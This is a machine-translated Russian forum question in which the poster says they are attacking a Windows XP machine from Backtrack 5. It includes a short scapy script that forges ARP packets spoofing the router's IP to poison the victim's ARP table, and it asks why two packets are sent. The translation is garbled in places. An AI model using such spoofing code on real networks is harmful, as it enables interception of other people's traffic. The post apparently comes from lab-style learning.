Я атакую машину Windows XP с Backtrack 5, используя scapy.Scapy arp poisoning не работает для меня
Теперь это мой код:
#! /usr/bin/env python
from scapy.all import *
arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)
Код выше фактически отправляет два пакета по какой-то причине. Один раз мой отступаться макинтош спрашивает:
, который имеет 192.168.0.106 (IP жертвы)? Скажите 192.168.0.108 (Backtrack's IP - НЕ ПРЕДОСТАВЛЯЕТСЯ!).
Затем он получает ответ «есть» от жертвы.
И второй раз макинтош моего BackTrack является вопросом:
, который имеет 192.168.0.106 (потерпевшего IP)? Tell 192.168.0.1 (IP-адрес маршрутизатора ).
Затем он получает ответ «от ответа» от жертвы.
Затем таблица ARP жертвы должна иметь линии одного и того же Mac, но разные IP-адреса, один из которых является реальным IP-адресом Backtrack, а второй - IP-адресом маршрутизатора.
Почему это происходит?